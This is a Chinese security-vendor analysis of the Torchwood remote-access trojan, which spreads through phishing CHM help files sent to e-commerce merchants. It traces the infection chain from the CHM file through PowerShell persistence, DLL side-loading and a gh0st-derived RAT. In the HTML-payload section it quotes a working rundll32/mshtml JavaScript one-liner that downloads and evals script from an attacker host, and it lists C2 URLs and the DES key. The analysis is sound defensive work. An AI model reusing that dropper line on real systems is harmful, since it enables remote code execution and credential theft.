通过CHM文件传播的Torchwood远控木马分析

0×1 概况

CHM文件格式是微软推出的基于HTML文件特性的帮助文件系统,也称作“已编译的HTML帮助文件”。CHM能够支持脚本、Flash、图片、音频、视频等内容,并且同样支持超链接目录、索引以及全文检索功能,常用来制作说明文档、电子书等以方便查阅,在绝大多数人的印象中,CHM类型文件是“无公害”文档文件。

双十一网购期间,腾讯反病毒实验室拦截到大量的恶意CHM格式文件,该批CHM文件伪装成“商户注册资料”、“最新风控通知”等电商相关资料,通过聊天工具,瞄准电商发动定向钓鱼攻击。由于当下正处网购旺季,文件名带有商家普遍关注的行业关键词,加上先入为主的CHM文件“无公害”印象,不少商家往往会放松警惕而打开钓鱼文件。实际上,商家一旦运行该恶意CHM文件,无需其它任何操作,电脑即可触发相关脚本下载和执行远控木马,导致电脑被控制,重要资料及帐号密码被盗取。

image001.png

图1. 部分传播量较大的木马样本

0×2木马行为分析

2.png

图2.木马运行进程链

1. CHM文件

CHM文件是经过压缩的各类资源的集合,使用7z解压软件直接打开木马样本,如图3所示,可以发现CHM文件内部包含一个.html文件。

3.png

图3. CHM文件内容

html文件内容如图4所示,里面插入了一个恶意的标签,内容为,rundll32.exe,javascript:”\..\mshtml,RunHTMLApplication “;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest.5.1″);h.Open(“GET”,”http://aaJone.com:1111/ccjone/connect.torch“,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject(“WScript%2eShell”).Run(“cmd /c taskkill /f /im rundll32.exe”,0,true);}其功能是一旦CHM文件被打开,就会执行命令,拉起一个rundll32.exe进程并执行相关脚本,实现下载hxxp://aaJone.com:1111/ccjone/connect.torch脚本文件并执行。其原理详见参考链接。

4.png

图4.html文件内容

2. connect.torch行为

connect.torch文件的功能是下载http://ccjone.com:1111/ccjone/rat.torch脚本文件并执行,如果下载失败还会将失败信息post到服务器。

5.png

图5. connect.torch文件内容

3. rat.torch行为

rat.torch的功能是拉起一个powershell进程,并执行powershell脚本,脚本经过base64编码,解码后如图7所示。

6.png

图6. rat.torch文件内容

powershell脚本主要实现以下功能:

1) 添加注册表开机启动项;

2) 下载http://aaJone.com:1111/ccjone/rar.log文件,该文件是winrar主程序;

3) 下载http://aaJone.com:1111/ccjone/ccjone.txt文件,该文件是一个压缩包;

4) 解压文件,解压密码为Torchwood;

5) 执行解压后得到的c:\microsoft\QQApp.exe;

6) 将木马文件设置为隐藏。

7.png

图7. 解码后的powershell脚本内容

8.png

图8. CHM打开后的进程启动关系

4. 远控木马

解压后的压缩包内容如图9所示,主要包含了两个白文件,一个黑文件xger.dll和一个数据文件,木马使用白加黑技术躲避检测和查杀。QQApp.exe是个白文件,其功能是启动同目录下的QQ.exe文件,QQ.exe文件也是一个白文件,带有数字签名,该文件运行后会加载xger.dll文件,从而实现白加黑利用。

9.png

图9. 压缩包解压后的文件列表

10.png

图10. 白文件QQ.exe的签名信息

11.png

图11. 白文件中动态加载未经校验的xger.dll的相关代码

5. xger.dll行为

xger.dll的功能是读取当前目录下在的gif.txt文件,并进行解密,gif.txt文件是个使用DES加密的数据文件,加密的密钥为Torchwood,解密成功后直接在内存中展开,并调用其Torchwood接口函数开始执行恶意行为。

12.png

图12. 读取gif.txt文件相关代码

13.png

图13. 解密相关代码,gif.txt经过DES加密

14.png

图14.解密密钥为Torchwood,解密后得到一个PE文件

6. Torchwood.dll行为

解密出来的Torchwood.dll文件是该木马的核心功能文件,其主要功能是连接C&C的9999端口,接受控制端发来的命令并执行相关行为,主要功能包括加载插件、文件管理、进程管理、CMD Shell、截屏、盗取密码等。通过与开源远控gh0st比较,发现命令分发部分代码有50%相似性,推测该木马是在gh0st源码基础上作的修改。

15.png

图15.连接C&C相关代码

16.png

图16. 远控木马命令分发

0×3溯源及相关数据附录

近期截获的这批恶意CHM文档具有高度的相似性,但是其C&C服务器较多,初步推测木马开发者可能只有一个,但是使用者众多。通过整理得到以下近期比较活跃的C&C地址,其中部分牧马人比较容易定位到。此外我们通过特征搜索,找到了疑似该远控木马的管理端和疑似作者。

17.png

图17. 部分比较活跃的C&C

18.png

图18.部分C&C域名注册信息

19.png

图19.部分C&C域名注册信息

20.png

图20.通过特征找到的疑似木马管理端

21.png

图21.通过特征找到的疑似木马配置器

部分chm样本hash:

5cfd49a9da5cf0eb9d8122e0ace286d5

01bc974e024f657cb361b7e83fdef307

e775e281da2230970f3bb45eca1b0cd7

a4015ffa20771ed58f6b43d661d4ff25

d9c03bca373d471c45bd7dd5e2d37da4

1ff1637a6286bfa98e8b83396e7c1774

973377c1d0ce3ecd66ce9ce71b853bc0

0×4安全建议

不要随意点开陌生文件,切勿因为CHM文件是“无公害”文档工具而掉以轻心,使用腾讯电脑管家可以实时拦截该病毒。

参考:

http://wps2015.org/drops/drops/JavaScript后门深层分析.html

*本文作者:腾讯手机管家,转载请注明来自FreeBuf.COM

Via: freebuf

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: